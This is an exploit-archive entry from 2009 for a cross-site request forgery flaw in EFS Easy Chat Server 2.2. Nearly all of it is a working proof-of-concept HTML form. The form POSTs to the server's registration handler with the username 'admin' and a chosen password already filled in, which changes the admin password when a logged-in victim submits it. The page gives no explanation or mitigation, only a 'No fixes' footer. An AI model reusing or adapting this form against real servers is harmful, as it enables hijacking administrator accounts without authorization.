EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability

2009-03-03 21:32:17

<HTML>
<!--

Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
-->
<HEAD>
<TITLE></TITLE>
<SCRIPT LANGUAGE="JavaScript">
</SCRIPT>
</HEAD>
<BODY bgcolor="#008000" LANGUAGE="JavaScript">
<div align=center>
<TABLE border="2" width="250">
<FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();">
<TR>
<TD align="center" class="title"> <font color=red>Booom!!</font> </TD>
</TR>
<TR>
<TD> Username:
<INPUT type="text" name="UserName" maxlength="30" value="admin"> *
</TD></TR>
<TR><TD>
Password:<INPUT type="password" name="Password" maxlength="30" value="stack"> *
</TD></TR>
<TR>
<TD> Confirm Password:
<INPUT type="password" name="Password1" maxlength="30" value="stack"> *
</TD></TR>
<TR>
</TD></TR>
<TR><TD>
Email:<INPUT type="text" name="Email" value="[email protected]" maxlength="30">
</TD></TR>
<TR><TD>
</TD></TR>
<TR><TD>
<BR>
<TEXTAREA rows="4" cols="30" name="Resume">chi le3ba</TEXTAREA>
</TD></TR>
<TR><TD align="center">
<INPUT type="submit" value="Click here to test" name=submit1>
<INPUT type="button" value="Close" name=button1 onclick="window.close();">
</TD></TR>
</form></TABLE>
</div>
<script language="JavaScript">
</script>
</BODY>
</HTML>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.